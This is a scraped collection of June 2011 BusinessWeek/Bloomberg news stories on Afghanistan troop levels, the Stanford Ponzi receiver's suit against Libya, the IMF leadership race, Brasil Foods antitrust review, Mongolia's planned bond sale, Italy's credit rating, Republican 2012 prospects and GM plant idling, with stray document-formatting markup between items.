at a congressional hearing.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level of troop drawdown could probably be reached within a year,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 has started paring U.S. forces in Afghanistan, even before Obama decides on the full size of the promised reduction, by re-routing 800 soldiers that were in training for the conflict.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administration is considering how much to cut troop strength in Afghanistan to meet the president's December 2009 pledge of starting to reduce the U.S. presence there next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is under pressure from fellow Democrats and some Republicans for a sizable cut in the almost 100,000 U.S. forces in Afghanistan, fighting alongside 47,000 troops from other countries in the NATO-led coalition.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the administration has said that the wars in Afghanistan and Iraq are only costing $117 billion this year as opposed to $159 billion the year before, this is a disproportionate amount of the defense budget on one small country," Lugar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said Pakistan "is a real worry" in terms of the safety and security of its nuclear weapons.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raised this question, and the Pakistanis have said this is our sovereign right to deal with this," he said. "As a matter of fact, they have felt we have been more and more intrusive and that we ought to get over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Laurie Asseo, Ann Hughey.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Catherine Dodge in Washington at cdodge1@bloomberg.net.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in Washington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Economic Policy U. S. Broadband Policy U.S. Energy Policy U.S. Automakers U.S. Competitiveness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http://www.businessweek.com/news/2011-06-17/lugar-gives-obama-mediocre-grade-for-u-s-foreign-policy-effort.html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Stanford Receiver Sues Libya for $55 Million, Lawyer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4:50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Brooklyn Money Manager Gets 20 Years for Ponzi Scheme MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News WaMu Settlement Agreement With Shareholders Said to Collapse Ex-Barai Analyst Admits Destroying Data After Rajaratnam Arrest Chinese Drywall Supplier Agrees to $54 Million Settlement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Laurel Brubaker Calkins and Andrew Harris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freezing of funds in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R. Allen Stanford's court-appointed receiver sued the Libyan government wealth fund for $55 million he claims the state withdrew from Stanford's alleged Ponzi scheme before it collapsed in early 2009, according to the receiver's lawyer.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Ralph S. Janvey, Stanford's receiver, also won a temporary freeze on some Libyan government bank accounts in the U.S. until a federal judge can determine if the money should be distributed to investors allegedly swindled of more than $7 billion, said Janvey's lead attorney, Kevin M. Sadler.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payments made to the Libyan defendants were fraudulent transfers, using funds which Stanford obtained by fraud from investors who purchased Stanford's phony CDs even as the Ponzi scheme was beginning to collapse,'' Sadler said today by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Janvey's suit was filed under seal June 3 in U.S. District Court in Dallas, Sadler said. The lawsuit couldn't be independently confirmed using the court's electronic docket.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Stanford, 61, denies all allegations of wrongdoing. He previously said he met with Libyan sovereign-wealth fund officials shortly before the U.S. Securities and Exchange Commission seized his operations on suspicion of fraud in February 2009.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Libyans withdrew $12 million of their Stanford investment immediately after this meeting, which occurred in Libya "just three weeks before the SEC filed suit,'' Sadler said in today's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Order to Freeze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Janvey obtained a court order on June 6 freezing $55 million in Libyan assets in U.S. bank accounts, pending a December hearing before U.S. District Judge David Godbey, Sadler said. The judge oversees the SEC's case against Stanford and several of his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Stanford faces 14 criminal charges that he deceived investors about the safety and oversight of certificates of deposit sold by his Antigua-based Stanford International Bank Ltd. He is in a prison hospital unit in Butner, North Carolina, until he completes rehabilitation from a prescription-drug dependency he acquired in jail.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billionaire has been in custody as a flight risk since his indictment in June 2009. His attorneys have asked for a delay in his criminal trial, now scheduled for September in Houston federal court, until he is found competent to assist in his defense.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criminal case is U.S. v. Stanford, 09-cr-342, U.S. District Court, Southern District of Texas (Houston). The SEC case is Securities and Exchange Commission v. Stanford International Bank, 09-cv-298, U.S. District Court, Northern District of Texas (Dallas).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Charles Carter, Glenn Holdcraft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Laurel Brubaker Calkins in Houston at laurel@calkins.us.com; Andrew Harris in Chicago at aharris16@bloomberg.net.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Stanford Business School Entrepreneurship in a Recession Business of Dermatology Fraud Protection Pharmacy Benefit Managers (PBMs)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http://www.businessweek.com/news/2011-06-17/stanford-receiver-sues-libya-for-55-million-lawyer-says.html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NJ Transit Says Trains to and From NYC Delayed Up to 45 Minutes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4:08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NJ Transit Says Trains to and From NYC Delayed Up to 30 Minutes WeinerБ─(tm)s Departure Removes Distraction for U.S. House Democrats Weiner Resigning From U.S. House After Admitting Lewd Messages Weiner of New York Said to Plan to Resign From U.S. House Citigroup Hires Hoover for Capital Markets Origination Role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Stefanie Batcho-Lino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New Jersey Transit said trains in and out of New York City are subject to delays of 30 to 45 minutes due to weather-related signal problems. The information was disclosed in an e-mailed statement. Earlier the NJ Transit said delays were as much as 30 minutes.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Stefanie Batcho-Lino at sbatcholino1@bloomberg.net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Marketing to Moms Marketing to Women Business-to-Business Marketing Broadway and Live Theater Social Media Training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http://www.businessweek.com/news/2011-06-17/nj-transit-says-trains-to-and-from-nyc-delayed-up-to-45-minutes.html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Lagarde, Carstens to Meet With IMF Board Next Week for Top Job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4:37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Emerging Stocks Fall to 3-Month Low on Greece, Technology Tumble MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Gordon GekkoБ─(tm)s Swiss Tax Haven Lures Rich From Emerging Markets Carstens in China Seeks Emerging-Market Backing for IMF Bid Netanyahu Says He WonБ─(tm)t Back Down After Meeting Obama Envoy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Sandrine Rastello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French Finance Minister Christine Lagarde and Mexican Central Bank Governor Agustin Carstens will be interviewed by the International Monetary Fund's executive board next week as they compete for the top job at the agency.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Carstens will be at the IMF in Washington June 20-21 and will meet with the board on his second day, Gita Bhatt, a spokeswoman for the fund, said in an e-mail. Lagarde will follow June 22-23, with her board interview June 23,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their visit to the fund, the candidates will also have an opportunity to meet bilaterally with executive directors," Bhatt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IMF aims to make a decision by June 30, a month and a half after the arrest of former chief Dominique Strauss-Kahn on charges including attempted rape. He has pleaded not guilty.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candidates have been traveling from Brazil to China in a bid for the job, and Lagarde, who has backing from the European Union and nations including Egypt and Morocco, has the most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Carlos Torres, Christopher Wellisz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Sandrine Rastello in Paris at srastello@bloomberg.net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Chris Wellisz at cwellisz@bloomberg.net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Recession Job Search Recession-Proofing Your Job Executive Job Search Steve Jobs Infrastructure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http://www.businessweek.com/news/2011-06-17/lagarde-carstens-to-meet-with-imf-board-next-week-for-top-job.html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Brasil Foods Posts Biggest Gain in Five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4:42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Brasil Foods Sinks as Cade Says Should Be Blocked BatistaБ─(tm)s OGX Receiving Offers for Campos, Parnaiba Fields Brasil Foods Vote Should Go Beyond Prices, CadeБ─(tm)s Lima Says Lower Cattle Sales Tighten Beef Supply, Boosting Packer Costs Brazil Antitrust Agency Said to Postpone Brasil Foods Ruling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Iuri Dantas and Lucia Kassai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(Corrects to show only one member voted against the transaction in second paragraph of story originally published June 15.)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15 (Bloomberg) - BRF - Brasil Foods SA, the world's largest poultry exporter, posted its biggest gain in five months on speculation it will reach an agreement with the Brazilian antitrust regulator to save the deal that created the company.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Sao Paulo-based food processor rose as much as 1.16 reais, or 4.7 percent, to 25.64 reais, the biggest intraday gain since Jan. 18, and was trading at 24.85 reais at 3:46 p.m. local time. The stock increased after the agency agreed to a request from Brasil Foods to postpone a vote on whether to block the transaction after one of five commissioners voted against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is offering to negotiate an agreement with the agency to save the $3.8 billion takeover about two years after the combination was formed from Perdigao SA's takeover of rival Sadia SA. Chief Executive Officer Jose Antonio do Prado Fay wants time to discuss possible solutions after commissioner Carlos Ragazzo said the company wields too much market power.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"Cade is giving more time to Brasil Foods," Fausto Gouveia, who helps manage about 250 million reais ($158 million) at Legan Asset Management, said today in a telephone interview from Sao Paulo. "We still have a bumpy road ahead, but for today the postponement is good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Fay's request prompted investors to bet Brasil Foods may be able to avoid an outright rejection of the purchase by agreeing to sell assets such as Sadia frozen pizzas or Perdigao sausages, said Flavio Barros, who helps manage about 300 million reais at Sao Paulo-based Grau Gestao de Ativos.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‘Ready to Negotiate'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ready to negotiate," Wilson Mello, vice president for corporate affairs at Brasil Foods, said today in Brasilia after the Cade postponement was made public. The company "fulfilled everything Cade has requested,"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Brazil's antitrust agency will convene again June 29, when commissioner Ruiz may present a proposal for an agreement or put the deal to a vote. According to Cade's rules, Ruiz is allowed to ask for a second delay to the vote and would need Cade's authorization for a third postponement.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formerly Perdigao SA, bought Sadia in 2009 after the bigger rival booked more than 3 billion reais in wrong-way currency bets, following the Lehman Brothers Holding Inc. collapse. The deal was supported by Brazilian pension funds of state-run companies, which collectively owned 22 percent of Perdigao and now hold a 23 percent stake in Brasil Foods.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Forced Divestitures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deal that was widely supported by the Brazilian government is unlikely to be outright rejected," Barros said June 13 in a telephone interview. "They will probably be forced to sell some business."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maker of Sadia frozen dinners and meatballs, which has 45 brands and may control 90 percent of some markets, has sufficient market share to increase prices without losing customers, Cade commissioner Carlos Ragazzo said June 8.</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a 78 percent market share of Brazil's frozen pizza sales, 62 percent of margarine and 69 percent of frozen meat, according to its annual report, based on data compiled by market researcher Nielsen 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Arnaldo Galvao, Mario Sergio Lima and Francisco Marcelino in Brasilia. Editors: Dale Crofts, Robin Saponar, Carlos Caminada.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Lucia Kassai in Sao Paulo at lkassai@bloomberg.net; or Iuri Dantas in Brasilia at idantas@bloomberg.net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Dale Crofts at dcrofts@bloomberg.net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Food Industry Whole Foods Market Women in Leadership Food Safety Specialty Foods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http://www.businessweek.com/news/2011-06-17/brasil-foods-posts-biggest-gain-in-five-months.html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Brasil Foods Sinks as Cade Says Should Be Blocked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4:24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Brasil Foods Posts Biggest Gain in Five Months BatistaБ─(tm)s OGX Receiving Offers for Campos, Parnaiba Fields Brasil Foods Vote Should Go Beyond Prices, CadeБ─(tm)s Lima Says Billionaire Cisneros to Team With China Banks in Commodities Emerging Stocks Fall to Three-Month Low on Europe, Rate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Lucia Kassai and Iuri Dantas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(Corrects to show only one member voted against transaction in third paragraph of story originally published June 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9 (Bloomberg) - BRF - Brasil Foods SA, the world's largest poultry exporter, fell to the lowest in more than six months after a Brazil antitrust commissioner said the $3.8 billion deal should be blocked as it has too much market share.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created about two years ago after Perdigao SA's acquisition of Sadia SA, declined 84 centavos, or 3.2 percent, to 25.31 reais in Sao Paulo trading. The stock earlier declined 7 percent to the lowest since Nov. 23, after yesterday falling as much as 7.7 percent. The drop erased $1.62 billion from Brasil Foods' market value over two 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Sao Paulo-based company can boost prices without losing customers, Carlos Ragazzo, one of five antitrust commissioners, who analyzed the case and recommended the agency reject the two- year old deal, said yesterday. The session was postponed for a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"Everyone was expecting the merger to be approved and two years later Cade casts this huge shadow," Fausto Gouveia, who helps manage 250 million reais ($160 million) at Legan Asset Management, said today in a telephone interview from Sao Paulo. "In the best scenario, the deal will be approved, but it will have to sell assets, which means less cash generation."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was cut to "underperform" from "market perform" today by Raymond James equity analyst Daniela Bretthauer. The stock was also downgraded to "neutral" from "buy" by Fabio Monteiro, an analyst at Banco BTG Pactual.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 Decision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Brazil's antitrust agency, known as Cade, will make a final decision at its next meeting on June 15 after a request to delay voting was made by member Ricardo Ruiz. In Brazil, regulators can reject a merger or force changes to it even after the companies have already combined operations.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"Seldom does one find in antitrust analysis a transaction in which the likelihood of damage to the market and consumers is so evident," Ragazzo said in Brasilia while arguing against the deal. "The proposed act is a textbook case as an example of a transaction that is impossible to be approved."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Fernando de Magalhaes Furlan, head of Cade, abstained from voting as he is a cousin of Brasil Foods's board member Luiz Fernando Furlan. Magalhaes also worked for Sadia between 1995 and 1998, according to information on Cade's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Yields on Brasil Foods bonds due 2020 surged 21 basis points, or 0.21 percentage point, to 6.08 percent at 4:17 p.m. New York time, the most since November, according to data compiled by Bloomberg. Notes due 2017 climbed 13 basis points to 5.56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Optimistic'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is still "optimistic" it can negotiate a solution with the regulator, Wilson Mello, vice president of institutional relations at Brasil Foods, told reporters yesterday in Brasilia after the hearing. In a separate statement, the company said the postponement of the ruling was "positive" as it gives officials more time to review the case.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negative vote has raised the probability of an outright rejection of the merger," Jose Yordan and Rebeca Sanchez Sarmiento, analysts at Deutsche Bank, wrote in a note to clients today. "We do not think that today's fall marks the bottom for the stock." They rate Brasil Foods "hold."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Perdigao bought Sadia in 2009 after its bigger rival booked more than 3 billion reais in wrong-way currency bets as the real declined after the collapse of Lehman Brothers Holding Inc. The producer of meat and dairy products, margarine, and frozen pizza had sales of 22.7 billion reais in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 accounts for about 60 percent of the company's sales and the remainder is shipped to 140 countries and sold under brands including Sadia, Perdigao and Perdix.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Pension Funds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is controlled by Previ and Petros, the pension funds for employees in Banco do Brasil SA and state-controlled oil producer Petroleo Brasileiro SA, which own 12.7 percent and 10 percent of the company. It has 41 distribution centers and 60 plants in Brazil, one in Argentina, two in Europe and employs 113,000, according to the company's website. It owns 45 brands.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must allow competition by a third company and may also have to share gains from the deal with customers, according to a May 10 report by Gilvandro Vasconcelos Coelho de Araujo, general attorney of Brazil's antitrust agency.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Brasil Foods said May 13 that first-quarter profit rose more than sixfold as demand for processed food and chicken exports offset increased commodities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 income increased to 383 million reais from 61 million reais in the year- earlier period, the company said. Revenue climbed 19 percent to 6.1 billion reais.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profit was boosted by increased demand for foods including chicken, Brasil Foods said. Tyson Foods Inc., the biggest U.S. meat processor, also reported chicken sales rose as more expensive beef and pork boosted poultry demand. Brasil Food's chicken exports gained 11 percent in the quarter.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Boris Korby in New York. Editors: Dale Crofts, Robin Saponar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Lucia Kassai in Sao Paulo at lkassai@bloomberg.net. Iuri Dantas in Brasilia Newsroom at idantas@bloomberg.net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Dale Crofts at dcrofts@bloomberg.net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Specialty Foods Industry Food Industry Whole Foods Market Foreclosure Crisis Organic Food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2011.06.18 00:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/brasil-foods-sinks-as-cade-says-should-be-blocked.html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Mongolia Planning Debut Dollar Bond Sale, Elbegdorj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3:32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Emerging Stocks Fall to Three-Month Low on Europe, Rate Concern Russia, China May Sign Gas Deal Later in Year Amid Wrangling Lead Output Drops in China as Pollution Shuts Battery Firms HSBC, Citi Said to Apply to Underwrite Yuan Bonds in China Stocks Rally on China Output, U.S. Retail Data; Treasuries Drop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Ye Xie and Sonja Elmquist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investor's comment in 10th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Mongolia plans to sell its debut dollar-denominated bond "in the near future," to finance expansion of the mining industry and build roads and bridges, President Tsakhia Elbegdorj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is talking to investment banks in New York about underwriting the planned $500 million debt sale, said Naidansuren Zoljargal, deputy governor at the nation's central bank, who is visiting the U.S. with the president. The $1 billion of 10-year debt that Sri Lanka, whose bonds carry the same B1 rating from Moody's Investors Service as Mongolia, sold in September yield 6.252 percent, unchanged from their issue.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"Mongolia is in a good shape in terms of issuing bonds and paying back those things," Elbegdorj, 48, said in an interview today at Bloomberg's headquarters in New York. "Our economic growth is good."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Mongolia's MSE Top 20 Index rose 108 percent in the past 12 months, the world's best performer among 91 stock benchmark measures tracked by Bloomberg, and the local currency gained 9 percent against the dollar as the country's exports of coal and copper surged. Resource-rich Mongolia, where Elbegdorj said the economy is growing at a rate of 7 percent to 8 percent, needs to quadruple the size of its rail network, add power and water plant, and build more roads to boost metal and mineral exports.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Currency Swaps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is also negotiating with Russia to secure currency swaps, according to Elbegdorj, who received a degree from Harvard University's John F. Kennedy School of Government in Cambridge, Massachusetts in 2002. He said he expects trade in local currency with Mongolia's two neighbors, Russia and China, to increase.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currency swap agreement signed with China last month paved the way for the planned five-year bond because the "safety belt" will boost investors' confidence in its debt market, Zoljargal said in a telephone interview in New York.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swap, worth 5 billion yuan ($772 million), allows Mongolia to tap the Chinese currency during an economic crisis. About 25 percent of trade between China and Mongolia is settled in the yuan, according to Zoljargal.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Policy makers are also keen to develop five-, 10- and 15- year benchmarks for its local-currency government bond market to secure financing and take advantage of growing interest from foreign investors, Zoljargal said. The Development Bank of Mongolia also plans to sell $700 million of domestic- currency bonds this year,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partnership agreement with the London Stock Exchange signed in January and aimed at overseeing the development of the Mongolian bourse and its sale to investors, will help spur international participation in the equity markets, where domestic investment is now dominant, Elbegdorj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focusing on developing our stock exchange,"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planned bond sale would open the international capital markets for the government and local companies to raise funds to finance $50 billion of investment projects in the next decade, said Zoljargal. Mongolia's B1 rating at Moody's is four levels below investment grade, while S&amp;P ranks it a step higher at BB-.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watching the market carefully," said Zoljargal. "The government really wants to have this. The benchmark itself is a very important thing for the private company to go to the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‘Quite Keen'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Jeremy Brewin, who manages $3.3 billion of emerging market assets as a fund manager at Aviva Investors in London, said he's interested in Mongolian dollar debt because of the nation's debt levels and commodities-driven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quite keen as it has very little debt outstanding and the resources, the declared resources, suggest that Mongolia is asset rich," he said. "Until proven otherwise, we like idea of investigating the credit with prospects for participating in the deal."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mining boom in the world's most sparsely populated nation promises the greatest influx of wealth for Mongolia since Genghis Khan conquered much of the known world in the 13th century.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growth may surge to 23 percent in 2013, more than twice the forecast expansion in China, as large mining projects begin production, the International Monetary Fund said in a March report.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Landlocked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companies such as Rio Tinto Group, the world's No. 2 mining company, are flocking to the landlocked country to tap its natural resources. Rio Tinto is developing the nation's natural resources Oyu Tolgoi copper and gold deposit, which it expects will account for 30 percent of Mongolia's gross domestic product when completed.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Mongolia may award its Tavan Tolgoi coal mining project, one of the largest in the world, to a group of companies as soon as this month, Elbegdorj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Elbegdorj, a former journalist who led the peaceful revolution that ended more than 65 years of communist rule in Mongolia in 1990, said he's concerned about how to "manage" the surge of foreign investment and ensure the windfall spreads among the nation's citizens. More than 33 percent of Mongolians live below the poverty line, and per capita income in the nation of 2.7 million is $2,111, the IMF said in 2010.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days, we focused on attracting investment," Elbegdorj said. "One of the biggest challenges is how to manage the money flowing from the mining to the benefit of our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Sandwiched between Russia's far east to the north and the 1.3 billion- strong, resource-hungry China to the south, Mongolia is looking for ways to lessen its vulnerability.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accounts for 80 percent of Mongolia's imports and buys about 85 percent of its exports, according to Mongolia's central bank data. The country depends almost 100 percent on Russian oil.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best interest is to balance investments and trade between our two neighbors, Russia and China, and other parts of the world," Elbegdorj said. "I'm trying to encourage investment from the United States of America."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Yuriy Humber in Tokyo and Andrew Hobbs in Sydney. Editors: Laura Zelenko.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Ye Xie in New York at yxie6@bloomberg.net; Sonja Elmquist at selmquist1@bloomberg.net.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David Papadopoulos at papadopoulos@bloomberg.net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Retail Sales Municipal Bonds Business Exit Planning Sales 2.0 Sales Operation Management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23:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/mongolia-planning-debut-dollar-bond-sale-elbegdorj-says.html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Stocks Trim Gain on Concern Italy's Debt Rating Will Be Cut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3:41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U.S. Stocks Pare Gains as Commodity, Technology Shares Retreat U.S. Stocks Extend Gains After Leading Indicators Top Estimates U.S. Stocks Pare Gains on Report of Basel Surcharge Proposal U.S. Stock Futures Pare Drop on Housing Starts, Jobless Claims U.S. Stock Futures Extend Losses as Empire Fed Trails Estimates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Michael P. Regan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U.S. stocks trimmed gains after Moody's Investors Service said it may cut Italy's credit rating, spurring concern Europe's debt crisis will worsen.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&amp; Poor's 500 Index rose less than 0.1 percent to 1,267.98 at 3:18 p.m. in New York after rallying as much as 1 percent in morning trading. The Dow Jones Industrial Average trimmed its advance to 19.3 points, or 0.2 percent, to 11,980.82.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Italy's Aa2 local and foreign currency government bond ratings may be cut by Moody's, the ratings provider said. The country's short-term Prime-1 ratings were affirmed.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Regan at mregan12@bloomberg.net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U.S. Stock Market U. S. Broadband Policy U.S. Healthcare System U.S. Competitiveness U.S. Economic History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23:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/u-s-stocks-trim-gain-on-concern-italy-s-debt-rating-will-be-cut.html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Italy's Aa2 Debt Credit Ratings May Be Reduced, Moody's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3:58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Euro Strengthens After Merkel Agrees to Greek Debt Compromise Greek Bonds Sink, CDS Jump to Record as Default Concern Mounts Greece Credit-Default Swaps Surge to Record 2,189 Basis Points Rehn Urges Greek Cuts to Unlock Payment, Predicts Bond Deal Greek Government Bonds Drop as Bailout Talks Stall; Bunds Rise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Dave Liedtka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ratings outlook in the second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Italy's credit ratings may be reduced by Moody's Investors Service because of economic growth challenges, risks associated with efforts to reduce debt and the potential for higher borrowing costs.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nation's Aa2 local and foreign currency government bond ratings were placed under review for a possible downgrade, Moody's said in a statement today. The country's short-term Prime-1 ratings were affirmed.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faces implementation risks for the fiscal consolidation plans that are required to reduce debt and keep it at affordable levels while the nation the faces the risk posed by changing funding conditions for European sovereigns with high levels of debt, Moody's said. The review will focus on the growth prospects for the economy and the outlook for a removal of structural bottlenecks that could hinder a medium-term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had debt of about 1.8 trillion euros ($2.6 trillion) at the end of last year and a ratio of debt to gross domestic product of about 119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 Greg Storey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Dave Liedtka at dliedtka@bloomberg.net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Credit-Rating Agency Reform Small Business Debt Debt Workouts Sovereign Debt Debt Settlement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23:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/italy-s-aa2-debt-credit-ratings-may-be-reduced-moody-s-says.html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Republicans See 2012 Prospects Rise With Slowing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3:31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Biden Says Deficit Talks Seek Signal With $4 Trillion in Savings Obama Said to Talk With CommerceБ─(tm)s Blank on Economist Job Boehner Says Lawmakers May Seek to Deny Libya Mission Funds Libya Mission Will Violate War Powers June 19, Boehner Says Huntsman Money Made in China Tests Obama EnvoyБ─(tm)s 2012 Hopes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Lisa Lerer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comments from Paul and Barbour, starting in eighth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The bad economic news buffering the U.S. is being welcomed in at least one quarter: among the Republican Party officials and activists gathered in New Orleans for a conference lasting through tomorrow.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Reflecting a renewed sense of hopefulness heading into the 2012 election, those attending the Republican Leadership Conference were optimistic that the recent wave of data showing a slowing recovery from the worst recession since the 1930s could add up to a victory for their party against President Barack Obama.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House Speaker Newt Gingrich of Georgia, the first of the major Republican presidential candidates to address the group, told the roughly 2,000 attendees yesterday that he was eager to spend his campaign talking about jobs, energy policy and the "Obama depression."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Gingrich asked his audience: "How can the president of the United States say to the country he's not concerned about a double-dip recession? How can he not be concerned when 14 million Americans are out of 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Candidate Showcase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three-day event, known as a showcase for aspiring nominees, comes as the Republican presidential field is solidifying and the contenders - as well as potential late entrants - are raising their profiles.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Representative Michele Bachmann of Minnesota, boosted by favorable reviews of her performance in a multi-candidate debate in New Hampshire on June 13, is scheduled to address attendees today. She plans to formally kick off her presidential campaign in Waterloo, Iowa, before the end of the month.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speaking today were three other declared candidates: Representative Ron Paul of Texas, former Pennsylvania Senator Rick Santorum and Herman Cain, the former chief executive officer of Godfather's Pizza Inc.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Paul began his speech by saying, "I have good news for the cause of liberty. The country is coming our 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quickly spotlighted the cause he is most closely identified with: abolishing the Federal Reserve.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Tomorrow's speakers include Texas Governor Rick Perry, who in late May sparked interest within Republican circles when he said he's "thinking about" a presidential bid.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Huntsman Cancels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Utah Governor Jon Huntsman, who had served as Obama's ambassador to China and will officially announce his presidential bid on June 21, canceled a scheduled appearance before the conference yesterday. He blamed a bad cold for his decision to skip the event.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Minnesota Governor Tim Pawlenty and former Massachusetts Governor Mitt Romney, both running for the nomination, are skipping the event, citing scheduling conflicts.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field is wide open," Mississippi Governor Haley Barbour said in a speech today. Barbour, who after exploring a presidential bid decided against it, urged the party activists not to get "hung up on purity." To win, he said, Republicans must rally around the eventual nominee.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candidate won't be perfect, but in this business, it's unity that wins elections,"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1980 Comparison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Gingrich, seeking to reboot his presidential campaign after a mass resignation of top campaign staff members last week, said in his speech that the 2012 presidential campaign was shaping up as a repeat of 1980, when Republican Ronald Reagan rode discontent with the nation's direction to victory over Democratic incumbent Jimmy Carter. "We've been here before," Gingrich said, as the audience cheered.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strategists point to the weak economy as providing new momentum for their party's hopes next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increased frustration because of the slowness of the recovery," said Whit Ayres, a Republican pollster who's working for Huntsman. "You can envision a very, very competitive presidential contest in 2012, unless things change dramatically."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unemployment rate rose to 9.1 percent in April, the highest level this year, according to Labor Department figures released June 3. The report was the latest indicator suggesting the nation's recovery has hit a soft patch.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Prices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consumer spending slowed in the year's first quarter, and confidence levels have since fallen. Manufacturing growth, a consistent contributor to the recovery, weakened across the globe in May. The S&amp;P/Case-Shiller Index released May 31 showed U.S. home prices in March dropped to the lowest level since 2003, further eroding home equity available to Americans.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candidates and top party officials have seized on the bad news.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all know the statistics. President Obama cannot possibly win re- election with this economy in the ditch," said Republican National Committee Chairman Reince Priebus at a Bloomberg Breakfast on June 8. "For our party, it provides us an enormous opportunity to defeat him."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opinion boost Obama gained after the killing of Osama bin Laden in a U.S, raid in Pakistan last month has dissipated, as disapproval over his handling of the economy has grown. In a Wall Street Journal/NBC News poll released yesterday, 49 percent said they approve of his performance, down from 52 percent last month. At the same time, 62 percent said the U.S. is on the wrong track, up 12 percentage points from a month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Democratic Argument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Democrats argue that while the recovery has been slow, it's only happening at all because of policies Obama put in place when he succeeded Republican George W. Bush in the White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own the economy," Democratic National Committee Chairwoman Debbie Wasserman Schultz, who also is a House member from Florida, said at a June 15 breakfast sponsored by POLITICO. "We own the beginning of the turn- around and we want to make sure we continue that pace of recovery, not go back to the policies of the past under the Bush administration that put us in the ditch in the first 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reasoning may not be enough to sway voters if the economy is still lagging. Unemployment is projected to be at 8.4 percent in the fall of 2012, according to the median forecast of economists surveyed by Bloomberg News in June.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Justin Blum in Tampa and Mike Dorning in Washington. Editors: Don Frederick, Paul Tighe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Lisa Lerer at llerer@bloomberg.net.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The Big Business of Synthetic Highs MBA Jobs: Post-Crisis, a Brave New World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Bitcoins: Currency of the Geeks Why Apple Isn't in the Dow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Indian Economy Global Economy Vietnam's Economy Thailand's Economy 2012 Presidential Election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23:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/republicans-see-2012-prospects-rise-with-slowing-economy.html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GM Will Idle Michigan, Indiana Plants to Pare Truck Supply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3:39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MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Volkswagen, BMW Lead Europe Car Sales Recovery on German Demand Toyota Expects Return to Full North America Output in September Visteon in China Means Earnings Are Free in Takeover: Real M&amp;A Fiat Says WonБ─(tm)t Risk Rating Downgrade to Buy Chrysler Stake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Craig Trudell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analyst's quote in fourth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General Motors Co. will idle U.S. truck plants for two weeks in July as the automaker pares inventory of pickups and prepares the factories for output of 2012 model year vehicles.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GM's Flint assembly in Michigan will shut down for the weeks of July 4 and July 11, said Tom Wickham, a spokesman for the Detroit-based automaker. Production at Fort Wayne assembly in Roanoke, Indiana, also will stop during those weeks, said Orval Plumlee, president of United Auto Workers Local 2209, which represents hourly workers among the factory's more than 3,300 employees.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plants make Chevrolet Silverado and GMC Sierra pickups. GM's truck inventory was 288,000 units at the end of May, up from 275,000 on April 30. The inventory included 258,000 units of large trucks, or 110 days supply, Don Johnson, GM's vice president of U.S. sales, said on a June 1 conference call. The industry standard is about 60 days supply.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"GM is rightly being quite careful about building products into the summer months and not getting caught with an excess amount of prior model year inventories," said Michael Robinet, an analyst at IHS Automotive in Northville, Michigan. "They're going to be careful not to build too much of the older model year vehicles and have to discount them heavily in the face of having newer model year vehicles on the same lot."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Adjusting Inventory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Reuss, president of GM's North American operations, said at a June 3 conference that the inventory of trucks was acceptable in the short term and wouldn't prompt a surge in discounts.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not going to run big incentives to clear inventory," Reuss said on Mackinac Island in northern Michigan earlier this month. "We'll adjust inventory on a production basis."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GM also makes large trucks in Arlington, Texas, and Silao, Mexico. Those plants will continue normal production while Flint and Fort Wayne are down, Chris Lee, a GM spokesman, said in a telephone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company's deliveries in May fell 1.2 percent to 221,192 vehicles, the Detroit-based company said in a June 1 statement. While Johnson said GM is "not anticipating tremendous growth" in the U.S. truck segment, sales may rebound in the second half due to seasonal factors and pent-up demand.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GM rose 27 cents, or 1 percent, to $28.86 at 3:01 p.m. in New York Stock Exchange composite trading. The shares were down 22 percent this year before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David Welch and Keith Naughton in Southfield, Michigan. Editors: Niamh Ring, Cecile Daurat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Craig Trudell in Southfield, Michigan, at ctrudell1@bloomberg.net.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Jamie Butters at jbutters@bloomberg.net.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Supply Chain Management Building Products Distribution Oil Speculation Shipping Industry Active Investors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23:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
